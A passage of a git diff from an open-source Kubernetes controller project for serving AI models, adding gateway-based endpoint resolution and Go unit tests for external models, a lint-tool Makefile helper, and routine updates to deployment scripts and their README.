func (h *externalModelHandler) GetModelEndpoint(ctx context.Context, log logr.Logger, model *maasv1alpha1.MaaSModelRef) (string, error) { - return "", fmt.Errorf("%w: ExternalModel", ErrKindNotImplemented) + if len(model.Status.HTTPRouteHostnames) > 0 { + hostname := model.Status.HTTPRouteHostnames[0] + return fmt.Sprintf("https://%s/%s", hostname, model.Name), nil + } + + gatewayName := h.r.gatewayName() + gatewayNS := h.r.gatewayNamespace() + gateway := &gatewayapiv1.Gateway{} + key := client.ObjectKey{Name: gatewayName, Namespace: gatewayNS} + if err := h.r.Get(ctx, key, gateway); err != nil { + return "", fmt.Errorf("failed to get gateway %s/%s: %w", gatewayNS, gatewayName, err) + } + + for _, listener := range gateway.Spec.Listeners { + if listener.Hostname != nil { + return fmt.Sprintf("https://%s/%s", string(*listener.Hostname), model.Name), nil + } + } + + for _, addr := range gateway.Status.Addresses { + if addr.Type != nil && *addr.Type == gatewayapiv1.HostnameAddressType { + return fmt.Sprintf("https://%s/%s", addr.Value, model.Name), nil + } + } + if len(gateway.Status.Addresses) > 0 { + log.Info("Using IP-based gateway address; TLS hostname verification may fail", + "address", gateway.Status.Addresses[0].Value, "model", model.Name) + return fmt.Sprintf("https://%s/%s", gateway.Status.Addresses[0].Value, model.Name), nil + } + + return "", fmt.Errorf("unable to determine endpoint: gateway %s/%s has no hostname or addresses", gatewayNS, gatewayName) } // CleanupOnDelete is called when the MaaSModelRef is deleted. -// -// Current behaviour: no-op. -// -// ExternalModel: the HTTPRoute is user-supplied, so the controller does not delete it. No implementation needed. +// ExternalModel: the HTTPRoute is user-supplied, so the controller does not delete it. 
func (h *externalModelHandler) CleanupOnDelete(ctx context.Context, log logr.Logger, model *maasv1alpha1.MaaSModelRef) error { return nil } // externalModelRouteResolver returns the HTTPRoute name/namespace for ExternalModel. // Used by findHTTPRouteForModel and by AuthPolicy/Subscription controllers to attach policies. -// Users supply the HTTPRoute; when implemented, resolve name/namespace from model spec (e.g. status or ModelReference fields). -// This default assumes a convention of "maas-model-" in model.Namespace until the API supports an explicit route ref. type externalModelRouteResolver struct{} func (externalModelRouteResolver) HTTPRouteForModel(ctx context.Context, c client.Reader, model *maasv1alpha1.MaaSModelRef) (routeName, routeNamespace string, err error) { diff --git a/maas-controller/pkg/controller/maas/providers_external_test.go b/maas-controller/pkg/controller/maas/providers_external_test.go new file mode 100644 index 000000000..796738461 --- /dev/null +++ b/maas-controller/pkg/controller/maas/providers_external_test.go @@ -0,0 +1,313 @@ +/* +Copyright 2025. + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. 
+*/ + +package maas + +import ( + "context" + "strings" + "testing" + + maasv1alpha1 "github.com/opendatahub-io/models-as-a-service/maas-controller/api/maas/v1alpha1" + metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" + "sigs.k8s.io/controller-runtime/pkg/log/zap" + gatewayapiv1 "sigs.k8s.io/gateway-api/apis/v1" +) + +func newExternalModel(name, ns, provider, endpoint string) *maasv1alpha1.MaaSModelRef { + return &maasv1alpha1.MaaSModelRef{ + ObjectMeta: metav1.ObjectMeta{Name: name, Namespace: ns}, + Spec: maasv1alpha1.MaaSModelSpec{ + ModelRef: maasv1alpha1.ModelReference{ + Kind: "ExternalModel", + Name: name, + }, + }, + } +} + +func newExternalModelCR(name, ns, provider, endpoint string) *maasv1alpha1.ExternalModel { + return &maasv1alpha1.ExternalModel{ + ObjectMeta: metav1.ObjectMeta{Name: name, Namespace: ns}, + Spec: maasv1alpha1.ExternalModelSpec{ + Provider: provider, + Endpoint: endpoint, + CredentialRef: maasv1alpha1.CredentialReference{ + Name: name + "-api-key", + }, + }, + } +} + +func newHTTPRouteWithGateway(name, ns, gatewayName, gatewayNS string) *gatewayapiv1.HTTPRoute { + gwNS := gatewayapiv1.Namespace(gatewayNS) + return &gatewayapiv1.HTTPRoute{ + ObjectMeta: metav1.ObjectMeta{Name: name, Namespace: ns}, + Spec: gatewayapiv1.HTTPRouteSpec{ + CommonRouteSpec: gatewayapiv1.CommonRouteSpec{ + ParentRefs: []gatewayapiv1.ParentReference{ + {Name: gatewayapiv1.ObjectName(gatewayName), Namespace: &gwNS}, + }, + }, + }, + Status: gatewayapiv1.HTTPRouteStatus{ + RouteStatus: gatewayapiv1.RouteStatus{ + Parents: []gatewayapiv1.RouteParentStatus{ + { + ParentRef: gatewayapiv1.ParentReference{ + Name: gatewayapiv1.ObjectName(gatewayName), + Namespace: &gwNS, + }, + Conditions: []metav1.Condition{ + {Type: string(gatewayapiv1.RouteConditionAccepted), Status: metav1.ConditionTrue}, + {Type: routeConditionProgrammed, Status: metav1.ConditionTrue}, + }, + }, + }, + }, + }, + } +} + +func newGatewayWithHostname(name, ns, hostname string) *gatewayapiv1.Gateway { + 
h := gatewayapiv1.Hostname(hostname) + return &gatewayapiv1.Gateway{ + ObjectMeta: metav1.ObjectMeta{Name: name, Namespace: ns}, + Spec: gatewayapiv1.GatewaySpec{ + Listeners: []gatewayapiv1.Listener{ + {Name: "https", Hostname: &h}, + }, + }, + } +} + +func TestExternalModel_ReconcileRoute_Success(t *testing.T) { + model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com") + externalModelCR := newExternalModelCR("gpt-4o", "default", "openai", "api.openai.com") + route := newHTTPRouteWithGateway("maas-model-gpt-4o", "default", "maas-default-gateway", "openshift-ingress") + + r, _ := newTestReconciler(model, externalModelCR, route) + r.GatewayName = "maas-default-gateway" + r.GatewayNamespace = "openshift-ingress" + handler := &externalModelHandler{r: r} + log := zap.New(zap.UseDevMode(true)) + + err := handler.ReconcileRoute(context.Background(), log, model) + if err != nil { + t.Fatalf("ReconcileRoute: unexpected error: %v", err) + } + + if model.Status.HTTPRouteName != "maas-model-gpt-4o" { + t.Errorf("HTTPRouteName = %q, want %q", model.Status.HTTPRouteName, "maas-model-gpt-4o") + } + if model.Status.HTTPRouteGatewayName != "maas-default-gateway" { + t.Errorf("HTTPRouteGatewayName = %q, want %q", model.Status.HTTPRouteGatewayName, "maas-default-gateway") + } +} + +func TestExternalModel_ReconcileRoute_MissingHTTPRoute(t *testing.T) { + model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com") + externalModelCR := newExternalModelCR("gpt-4o", "default", "openai", "api.openai.com") + // Pre-populate status to verify it gets cleared + model.Status.HTTPRouteName = "stale-route" + model.Status.Endpoint = "https://stale.example.com/gpt-4o" + + r, _ := newTestReconciler(model, externalModelCR) + r.GatewayName = "maas-default-gateway" + r.GatewayNamespace = "openshift-ingress" + handler := &externalModelHandler{r: r} + log := zap.New(zap.UseDevMode(true)) + + err := handler.ReconcileRoute(context.Background(), log, model) + if err != nil 
{ + t.Fatalf("ReconcileRoute: expected nil error for missing HTTPRoute (Pending), got: %v", err) + } + if model.Status.HTTPRouteName != "" { + t.Errorf("HTTPRouteName should be cleared, got %q", model.Status.HTTPRouteName) + } + if model.Status.Endpoint != "" { + t.Errorf("Endpoint should be cleared, got %q", model.Status.Endpoint) + } +} + +func TestExternalModel_ReconcileRoute_MissingExternalModel(t *testing.T) { + model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com") + // Don't create ExternalModel CR - it should fail + + r, _ := newTestReconciler(model) + handler := &externalModelHandler{r: r} + log := zap.New(zap.UseDevMode(true)) + + err := handler.ReconcileRoute(context.Background(), log, model) + if err == nil { + t.Fatal("ReconcileRoute: expected error for missing ExternalModel CR") + } + if !strings.Contains(err.Error(), "ExternalModel") || !strings.Contains(err.Error(), "not found") { + t.Errorf("ReconcileRoute: error = %q, want to contain 'ExternalModel' and 'not found'", err.Error()) + } +} + +func TestExternalModel_ReconcileRoute_WrongGateway(t *testing.T) { + model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com") + externalModelCR := newExternalModelCR("gpt-4o", "default", "openai", "api.openai.com") + route := newHTTPRouteWithGateway("maas-model-gpt-4o", "default", "wrong-gateway", "wrong-ns") + + r, _ := newTestReconciler(model, externalModelCR, route) + r.GatewayName = "maas-default-gateway" + r.GatewayNamespace = "openshift-ingress" + handler := &externalModelHandler{r: r} + log := zap.New(zap.UseDevMode(true)) + + err := handler.ReconcileRoute(context.Background(), log, model) + if err == nil { + t.Fatal("ReconcileRoute: expected error for wrong gateway") + } + if !strings.Contains(err.Error(), "does not reference gateway") { + t.Errorf("ReconcileRoute: error = %q, want to contain 'does not reference gateway'", err.Error()) + } +} + +func TestExternalModel_Status_Ready(t *testing.T) { + model := 
newExternalModel("gpt-4o", "default", "openai", "api.openai.com") + model.Status.HTTPRouteName = "maas-model-gpt-4o" + model.Status.HTTPRouteGatewayName = "maas-default-gateway" + model.Status.HTTPRouteHostnames = []string{"maas.example.com"} + + r, _ := newTestReconciler(model) + handler := &externalModelHandler{r: r} + log := zap.New(zap.UseDevMode(true)) + + endpoint, ready, err := handler.Status(context.Background(), log, model) + if err != nil { + t.Fatalf("Status: unexpected error: %v", err) + } + if !ready { + t.Error("Status: ready = false, want true") + } + if endpoint != "https://maas.example.com/gpt-4o" { + t.Errorf("Status: endpoint = %q, want %q", endpoint, "https://maas.example.com/gpt-4o") + } +} + +func TestExternalModel_Status_NotReadyWhenGatewayNotAccepted(t *testing.T) { + model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com") + // HTTPRouteName set but gateway not yet accepted (no HTTPRouteGatewayName) + model.Status.HTTPRouteName = "maas-model-gpt-4o" + + r, _ := newTestReconciler(model) + handler := &externalModelHandler{r: r} + log := zap.New(zap.UseDevMode(true)) + + _, ready, err := handler.Status(context.Background(), log, model) + if err != nil { + t.Fatalf("Status: unexpected error: %v", err) + } + if ready { + t.Error("Status: ready = true, want false (gateway not yet accepted)") + } +} + +func TestExternalModel_Status_NotReady(t *testing.T) { + model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com") + + r, _ := newTestReconciler(model) + handler := &externalModelHandler{r: r} + log := zap.New(zap.UseDevMode(true)) + + _, ready, err := handler.Status(context.Background(), log, model) + if err != nil { + t.Fatalf("Status: unexpected error: %v", err) + } + if ready { + t.Error("Status: ready = true, want false") + } +} + +func TestExternalModel_GetModelEndpoint_FromHostnames(t *testing.T) { + model := newExternalModel("claude-sonnet", "default", "anthropic", "api.anthropic.com") + 
model.Status.HTTPRouteHostnames = []string{"maas.example.com"} + + r, _ := newTestReconciler(model) + handler := &externalModelHandler{r: r} + log := zap.New(zap.UseDevMode(true)) + + endpoint, err := handler.GetModelEndpoint(context.Background(), log, model) + if err != nil { + t.Fatalf("GetModelEndpoint: unexpected error: %v", err) + } + if endpoint != "https://maas.example.com/claude-sonnet" { + t.Errorf("GetModelEndpoint = %q, want %q", endpoint, "https://maas.example.com/claude-sonnet") + } +} + +func TestExternalModel_GetModelEndpoint_FromGateway(t *testing.T) { + model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com") + gateway := newGatewayWithHostname("maas-default-gateway", "openshift-ingress", "maas.cluster.example.com") + + r, _ := newTestReconciler(model, gateway) + r.GatewayName = "maas-default-gateway" + r.GatewayNamespace = "openshift-ingress" + handler := &externalModelHandler{r: r} + log := zap.New(zap.UseDevMode(true)) + + endpoint, err := handler.GetModelEndpoint(context.Background(), log, model) + if err != nil { + t.Fatalf("GetModelEndpoint: unexpected error: %v", err) + } + if endpoint != "https://maas.cluster.example.com/gpt-4o" { + t.Errorf("GetModelEndpoint = %q, want %q", endpoint, "https://maas.cluster.example.com/gpt-4o") + } +} + +func TestExternalModel_CleanupOnDelete(t *testing.T) { + model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com") + + r, _ := newTestReconciler(model) + handler := &externalModelHandler{r: r} + log := zap.New(zap.UseDevMode(true)) + + err := handler.CleanupOnDelete(context.Background(), log, model) + if err != nil { + t.Fatalf("CleanupOnDelete: unexpected error: %v", err) + } +} + +func TestExternalModel_CredentialRef(t *testing.T) { + externalModel := newExternalModelCR("gpt-4o", "default", "openai", "api.openai.com") + externalModel.Spec.CredentialRef = maasv1alpha1.CredentialReference{ + Name: "openai-api-key", + } + + if externalModel.Spec.CredentialRef.Name != 
"openai-api-key" { + t.Errorf("CredentialRef.Name = %q, want %q", externalModel.Spec.CredentialRef.Name, "openai-api-key") + } +} + +func TestExternalModelRouteResolver(t *testing.T) { + model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com") + resolver := externalModelRouteResolver{} + + routeName, routeNS, err := resolver.HTTPRouteForModel(context.Background(), nil, model) + if err != nil { + t.Fatalf("HTTPRouteForModel: unexpected error: %v", err) + } + if routeName != "maas-model-gpt-4o" { + t.Errorf("routeName = %q, want %q", routeName, "maas-model-gpt-4o") + } + if routeNS != "default" { + t.Errorf("routeNS = %q, want %q", routeNS, "default") + } +} diff --git a/maas-controller/pkg/controller/maas/providers_llmisvc.go b/maas-controller/pkg/controller/maas/providers_llmisvc.go index 6729ee699..3ac30d297 100644 --- a/maas-controller/pkg/controller/maas/providers_llmisvc.go +++ b/maas-controller/pkg/controller/maas/providers_llmisvc.go @@ -52,8 +52,8 @@ func (h *llmisvcHandler) validateLLMISvcHTTPRoute(ctx context.Context, log logr. 
return fmt.Errorf("failed to list HTTPRoutes for LLMInferenceService %s: %w", model.Spec.ModelRef.Name, err) } if len(routeList.Items) == 0 { - log.Error(nil, "HTTPRoute not found for LLMInferenceService", "llmisvcName", model.Spec.ModelRef.Name, "namespace", routeNS) - return fmt.Errorf("HTTPRoute not found for LLMInferenceService %s in namespace %s", model.Spec.ModelRef.Name, routeNS) + log.V(1).Info("HTTPRoute not found for LLMInferenceService, will retry when created", "llmisvcName", model.Spec.ModelRef.Name, "namespace", routeNS) + return fmt.Errorf("%w: for LLMInferenceService %s in namespace %s", ErrHTTPRouteNotFound, model.Spec.ModelRef.Name, routeNS) } route := &routeList.Items[0] routeName := route.Name @@ -210,7 +210,7 @@ func (llmisvcRouteResolver) HTTPRouteForModel(ctx context.Context, c client.Read return "", "", fmt.Errorf("failed to list HTTPRoutes for LLMInferenceService %s: %w", model.Spec.ModelRef.Name, err) } if len(routeList.Items) == 0 { - return "", "", fmt.Errorf("HTTPRoute not found for LLMInferenceService %s in namespace %s", model.Spec.ModelRef.Name, llmisvcNS) + return "", "", fmt.Errorf("%w: for LLMInferenceService %s in namespace %s", ErrHTTPRouteNotFound, model.Spec.ModelRef.Name, llmisvcNS) } route := &routeList.Items[0] return route.Name, route.Namespace, nil diff --git a/maas-controller/tools.mk b/maas-controller/tools.mk new file mode 100644 index 000000000..3f1b3e881 --- /dev/null +++ b/maas-controller/tools.mk @@ -0,0 +1,30 @@ +PROJECT_DIR := $(shell dirname $(abspath $(lastword $(MAKEFILE_LIST)))) +LOCALBIN := $(PROJECT_DIR)/bin/tools + +$(LOCALBIN): + mkdir -p $(LOCALBIN) + +## Tools +GOLANGCI_LINT ?= $(LOCALBIN)/golangci-lint + +GOLANGCI_LINT_VERSION ?= v2.6.2 +# Target the versioned binary so version bumps trigger reinstall +$(GOLANGCI_LINT)-$(GOLANGCI_LINT_VERSION): $(LOCALBIN) + $(call go-install-tool,$(GOLANGCI_LINT),github.com/golangci/golangci-lint/v2/cmd/golangci-lint,$(GOLANGCI_LINT_VERSION)) +$(GOLANGCI_LINT): 
$(GOLANGCI_LINT)-$(GOLANGCI_LINT_VERSION) + +# go-install-tool will 'go install' any package with custom target and name of binary, if it doesn't exist +# $1 - target path with name of binary (ideally with version) +# $2 - package url which can be installed +# $3 - specific version of package +define go-install-tool +@[ -f "$(1)-$(3)" ] || { \ +set -e; \ +package=$(2)@$(3) ;\ +echo "Downloading $${package}" ;\ +rm -f $(1) || true ;\ +GOBIN=$(LOCALBIN) go install $${package} ;\ +mv $(1) $(1)-$(3) ;\ +} ;\ +ln -sf $(1)-$(3) $(1) +endef diff --git a/scripts/README.md b/scripts/README.md index 20834a0c8..f27082035 100644 --- a/scripts/README.md +++ b/scripts/README.md @@ -52,6 +52,7 @@ Automated deployment script for OpenShift clusters supporting both operator-base **Environment Variables:** - `MAAS_API_IMAGE` - Custom MaaS API container image (works in both operator and kustomize modes) +- `MAAS_CONTROLLER_IMAGE` - Custom MaaS controller container image - `OPERATOR_CATALOG` - Custom operator catalog for PR testing - `OPERATOR_IMAGE` - Custom operator image for PR testing - `OPERATOR_TYPE` - Operator type (odh/rhoai) @@ -146,6 +147,22 @@ Results: --- +### `setup-authorino-tls.sh` +Configures Authorino for TLS communication with maas-api. Run automatically by `deploy.sh` when `--enable-tls-backend` is set (default). + +**Usage:** +```bash +# Configure Authorino TLS (default: kuadrant-system) +./scripts/setup-authorino-tls.sh + +# For RHCL, use rh-connectivity-link namespace +AUTHORINO_NAMESPACE=rh-connectivity-link ./scripts/setup-authorino-tls.sh +``` + +**Note:** This script patches Authorino's service, CR, and deployment. Use `--disable-tls-backend` with `deploy.sh` to skip if you manage Authorino TLS separately. + +--- + ### `install-dependencies.sh` Installs individual dependencies (Kuadrant, ODH, etc.). @@ -159,9 +176,13 @@ Installs individual dependencies (Kuadrant, ODH, etc.). 
``` **Options:** +- `--all`: Install all components - `--kuadrant`: Install Kuadrant operator and dependencies -- `--istio`: Install Istio -- `--prometheus`: Install Prometheus +- `--istio`: Install Istio service mesh +- `--odh`: Install OpenDataHub operator (OpenShift only) +- `--kserve`: Install KServe model serving platform +- `--prometheus`: Install Prometheus operator +- `--ocp`: Use OpenShift-specific handling --- diff --git a/scripts/deploy-custom-maas-image.sh b/scripts/deploy-custom-maas-image.sh deleted file mode 100755 index 25ba73b6c..000000000 --- a/scripts/deploy-custom-maas-image.sh +++ /dev/null @@ -1,315 +0,0 @@ -#!/usr/bin/env bash - -# deploy-custom-maas-image.sh -# Deploys a custom maas-api image to an ODH cluster with all necessary fixes -# -# Usage: -# ./scripts/deploy-custom-maas-image.sh -# -# Example: -# ./scripts/deploy-custom-maas-image.sh quay.io/myuser/maas-api:my-tag - -set -euo pipefail - -# Colors for output -RED='\033[0;31m' -GREEN='\033[0;32m' -YELLOW='\033[1;33m' -BLUE='\033[0;34m' -NC='\033[0m' # No Color - -# Configuration -NAMESPACE="${NAMESPACE:-opendatahub}" -TIMEOUT="${TIMEOUT:-300}" # 5 minutes - -# Helper functions -log_info() { - echo -e "${BLUE}[INFO]${NC} $*" -} - -log_success() { - echo -e "${GREEN}[SUCCESS]${NC} $*" -} - -log_warn() { - echo -e "${YELLOW}[WARN]${NC} $*" -} - -log_error() { - echo -e "${RED}[ERROR]${NC} $*" -} - -check_prerequisites() { - log_info "Checking prerequisites..." - - local missing=() - - command -v kubectl &>/dev/null || missing+=("kubectl") - command -v jq &>/dev/null || missing+=("jq") - - if [[ ${#missing[@]} -gt 0 ]]; then - log_error "Missing required tools: ${missing[*]}" - exit 1 - fi - - # Check cluster connection - if ! 
kubectl cluster-info &>/dev/null; then - log_error "Cannot connect to Kubernetes cluster" - log_error "Please ensure you are logged in (oc login or kubectl config)" - exit 1 - fi - - log_success "Prerequisites check passed" -} - -wait_for_deployment() { - local deployment=$1 - local namespace=$2 - local timeout=${3:-300} - - log_info "Waiting for deployment/${deployment} in ${namespace} to be ready (timeout: ${timeout}s)..." - - if kubectl rollout status deployment/"${deployment}" -n "${namespace}" --timeout="${timeout}s" &>/dev/null; then - log_success "Deployment ${deployment} is ready" - return 0 - else - log_warn "Deployment ${deployment} did not become ready within timeout" - return 1 - fi -} - -check_deployment_exists() { - local deployment=$1 - local namespace=$2 - - if kubectl get deployment "${deployment}" -n "${namespace}" &>/dev/null; then - return 0 - else - return 1 - fi -} - -fix_rbac_permissions() { - log_info "Applying RBAC permissions fix..." - - # Check if permissions already exist - if kubectl get clusterrole maas-api -o json | jq -e '.rules[] | select(.apiGroups[] == "maas.opendatahub.io")' &>/dev/null; then - log_info "RBAC permissions already include maas.opendatahub.io - skipping" - return 0 - fi - - kubectl patch clusterrole maas-api --type='json' -p='[ - { - "op": "add", - "path": "/rules/-", - "value": { - "apiGroups": ["maas.opendatahub.io"], - "resources": ["maasmodels", "maassubscriptions"], - "verbs": ["get", "list", "watch"] - } - } - ]' || { - log_error "Failed to patch ClusterRole" - return 1 - } - - log_success "RBAC permissions fixed" -} - -disable_operator_reconciliation() { - log_info "Disabling operator reconciliation (scaling to 0)..." - - if ! 
kubectl get deployment opendatahub-operator-controller-manager -n "${NAMESPACE}" &>/dev/null; then - log_warn "ODH operator deployment not found - skipping operator scaling" - return 0 - fi - - kubectl scale deployment opendatahub-operator-controller-manager \ - -n "${NAMESPACE}" --replicas=0 || { - log_error "Failed to scale operator to 0" - return 1 - } - - # Wait for operator to scale down - sleep 5 - - log_success "Operator reconciliation disabled" -} - -update_custom_image() { - local custom_image=$1 - - log_info "Updating maas-api deployment with custom image: ${custom_image}" - - kubectl patch deployment maas-api -n "${NAMESPACE}" --type='json' -p='[ - { - "op": "replace", - "path": "/spec/template/spec/containers/0/image", - "value": "'"${custom_image}"'" - } - ]' || { - log_error "Failed to update image" - return 1 - } - - log_success "Custom image configured" -} - -verify_deployment() { - log_info "Verifying deployment..." - - # Wait for rollout - if ! wait_for_deployment "maas-api" "${NAMESPACE}" "${TIMEOUT}"; then - log_error "Deployment did not become ready" - log_info "Checking pod status..." - kubectl get pods -n "${NAMESPACE}" -l app.kubernetes.io/name=maas-api - log_info "Recent logs:" - kubectl logs -n "${NAMESPACE}" deployment/maas-api --tail=50 || true - return 1 - fi - - # Check image - local actual_image - actual_image=$(kubectl get deployment maas-api -n "${NAMESPACE}" \ - -o jsonpath='{.spec.template.spec.containers[0].image}') - log_info "Running image: ${actual_image}" - - # Check pod status - local pod_status - pod_status=$(kubectl get pods -n "${NAMESPACE}" -l app.kubernetes.io/name=maas-api \ - -o jsonpath='{.items[0].status.phase}' 2>/dev/null || echo "Unknown") - log_info "Pod status: ${pod_status}" - - if [[ "${pod_status}" == "Running" ]]; then - log_success "Pod is running" - - # Check logs for success indicators - log_info "Checking logs for database connection..." 
- if kubectl logs -n "${NAMESPACE}" deployment/maas-api --tail=100 | \ - grep -q "Connected to PostgreSQL database"; then - log_success "PostgreSQL connection established" - else - log_warn "Could not verify PostgreSQL connection in logs" - fi - - if kubectl logs -n "${NAMESPACE}" deployment/maas-api --tail=100 | \ - grep -q "Server starting"; then - log_success "Server started successfully" - else - log_warn "Could not verify server startup in logs" - fi - - return 0 - else - log_error "Pod is not running (status: ${pod_status})" - return 1 - fi -} - -show_next_steps() { - cat < - -Example: - $0 quay.io/myuser/maas-api:my-tag - -This script automates deployment of a custom maas-api image by: - 1. Fixing RBAC permissions for maasmodels/maassubscriptions - 2. Disabling operator reconciliation - 3. Updating to custom image - 4. Verifying deployment health - -For more details, see: docs/CUSTOM_IMAGE_DEPLOYMENT.md -EOF - exit 1 - fi - - local custom_image=$1 - - echo "" - log_info "=========================================" - log_info " Custom MaaS API Image Deployment" - log_info "=========================================" - log_info "Image: ${custom_image}" - log_info "Namespace: ${NAMESPACE}" - log_info "=========================================" - echo "" - - # Run checks and fixes - check_prerequisites - - # Check if maas-api deployment exists - if ! 
check_deployment_exists "maas-api" "${NAMESPACE}"; then - log_error "maas-api deployment not found in namespace ${NAMESPACE}" - log_error "Please deploy ODH first using: ./scripts/deploy.sh" - exit 1 - fi - - # Apply fixes in order - fix_rbac_permissions || exit 1 - disable_operator_reconciliation || exit 1 - update_custom_image "${custom_image}" || exit 1 - - # Verify - if verify_deployment; then - show_next_steps - exit 0 - else - log_error "Deployment verification failed" - log_error "Please check logs and pod status manually" - exit 1 - fi -} - -main "$@" diff --git a/scripts/deploy.sh b/scripts/deploy.sh index aad9e48fc..020e35bad 100755 --- a/scripts/deploy.sh +++ b/scripts/deploy.sh @@ -30,6 +30,7 @@ # MAAS_CONTROLLER_IMAGE Custom MaaS controller container image # OPERATOR_TYPE Operator type (rhoai/odh) # LOG_LEVEL Logging verbosity (DEBUG, INFO, WARN, ERROR) +# KUSTOMIZE_FORCE_CONFLICTS When true, use --force-conflicts on kubectl apply in kustomize mode # # EXAMPLES: # # Deploy ODH (default, uses kuadrant policy engine) @@ -82,8 +83,11 @@ DRY_RUN="${DRY_RUN:-false}" OPERATOR_CATALOG="${OPERATOR_CATALOG:-}" OPERATOR_IMAGE="${OPERATOR_IMAGE:-}" OPERATOR_CHANNEL="${OPERATOR_CHANNEL:-}" +OPERATOR_STARTING_CSV="${OPERATOR_STARTING_CSV:-}" +OPERATOR_INSTALL_PLAN_APPROVAL="${OPERATOR_INSTALL_PLAN_APPROVAL:-}" MAAS_API_IMAGE="${MAAS_API_IMAGE:-}" MAAS_CONTROLLER_IMAGE="${MAAS_CONTROLLER_IMAGE:-}" +KUSTOMIZE_FORCE_CONFLICTS="${KUSTOMIZE_FORCE_CONFLICTS:-false}" #────────────────────────────────────────────────────────────── # HELP TEXT @@ -153,9 +157,12 @@ ENVIRONMENT VARIABLES: MAAS_API_IMAGE Custom MaaS API container image MAAS_CONTROLLER_IMAGE Custom MaaS controller container image OPERATOR_CATALOG Custom operator catalog - OPERATOR_IMAGE Custom operator image - OPERATOR_TYPE Operator type (rhoai/odh) - LOG_LEVEL Logging verbosity (DEBUG, INFO, WARN, ERROR) + OPERATOR_IMAGE Custom operator image + OPERATOR_STARTING_CSV ODH Subscription startingCSV (default: 
opendatahub-operator.v3.4.0-ea.1; "-" to omit) + OPERATOR_INSTALL_PLAN_APPROVAL ODH Subscription OLM approval (default: Manual — no auto-upgrades; first InstallPlan is auto-approved by the script) + OPERATOR_TYPE Operator type (rhoai/odh) + LOG_LEVEL Logging verbosity (DEBUG, INFO, WARN, ERROR) + KUSTOMIZE_FORCE_CONFLICTS When true, pass --force-conflicts to kubectl apply in kustomize mode (default: false) EXAMPLES: # Deploy ODH (default, uses kuadrant policy engine) @@ -567,18 +574,29 @@ deploy_via_kustomize() { kubectl create namespace "$NAMESPACE" fi + # Note: The subscription namespace (default: models-as-a-service) is automatically + # created by maas-controller when it starts (see maas-controller/cmd/manager/main.go). + # We only set the variable here for use in manifest patching below. + local subscription_namespace="${MAAS_SUBSCRIPTION_NAMESPACE:-models-as-a-service}" + # Deploy PostgreSQL for API key storage (requires namespace to exist) deploy_postgresql log_info "Applying kustomize manifests..." - kubectl apply --server-side=true -f <(kustomize build "$overlay") + # Patch the maas-api URL placeholder with actual namespace + # Patch MAAS_SUBSCRIPTION_NAMESPACE env var with the configured subscription namespace + kubectl apply --server-side=true --force-conflicts="$KUSTOMIZE_FORCE_CONFLICTS" -f <( + kustomize build "$overlay" | \ + sed "s/maas-api\.placehold\.svc/maas-api.$NAMESPACE.svc/g" | \ + perl -pe 'BEGIN{undef $/;} s/(name: MAAS_SUBSCRIPTION_NAMESPACE\n\s+value: ")[^"]*"/${1}'"$subscription_namespace"'"/smg' + ) # Apply gateway policies separately so they stay in openshift-ingress (overlay # namespace would otherwise overwrite them to $NAMESPACE) local policies_dir="$project_root/deployment/base/maas-controller/policies" if [[ -d "$policies_dir" ]]; then log_info "Applying gateway policies (openshift-ingress)..." 
- kubectl apply --server-side=true -f <(kustomize build "$policies_dir") + kubectl apply --server-side=true --force-conflicts="$KUSTOMIZE_FORCE_CONFLICTS" -f <(kustomize build "$policies_dir") fi # Configure TLS backend (if enabled) @@ -597,139 +615,7 @@ deploy_via_kustomize() { #────────────────────────────────────────────────────────────── deploy_postgresql() { - log_info "Deploying PostgreSQL for API key storage..." - - # Check if PostgreSQL already exists - if kubectl get deployment postgres -n "$NAMESPACE" &>/dev/null; then - log_info " PostgreSQL already deployed in namespace $NAMESPACE" - log_info " Service: postgres:5432" - log_info " Secret: maas-db-config (contains DB_CONNECTION_URL)" - return 0 - fi - - # PostgreSQL configuration (POC-grade, not for production) - local POSTGRES_USER="${POSTGRES_USER:-maas}" - local POSTGRES_DB="${POSTGRES_DB:-maas}" - - # Generate random password if not provided - local POSTGRES_PASSWORD="${POSTGRES_PASSWORD:-}" - if [[ -z "$POSTGRES_PASSWORD" ]]; then - POSTGRES_PASSWORD="$(openssl rand -base64 32 | tr -d '/+=' | cut -c1-32)" - log_info " Generated random PostgreSQL password (stored in secret postgres-creds)" - fi - - log_info " Creating PostgreSQL deployment..." - log_info " ⚠️ Using POC configuration (ephemeral storage)" - - # Deploy PostgreSQL resources - kubectl apply -n "$NAMESPACE" -f - </dev/null || true) + if [[ -n "$ip_name" ]]; then + local approved + approved=$(kubectl get installplan "$ip_name" -n "$namespace" -o jsonpath='{.spec.approved}' 2>/dev/null || echo "") + if [[ "$approved" == "false" ]]; then + log_info "Approving initial InstallPlan $ip_name (Manual subscription)" + kubectl patch installplan "$ip_name" -n "$namespace" --type=merge -p '{"spec":{"approved":true}}' || { + log_warn "Could not approve InstallPlan $ip_name" + } + fi + return 0 + fi + sleep "$interval" + elapsed=$((elapsed + interval)) + done + + # Fallback: single pending InstallPlan in namespace (e.g. 
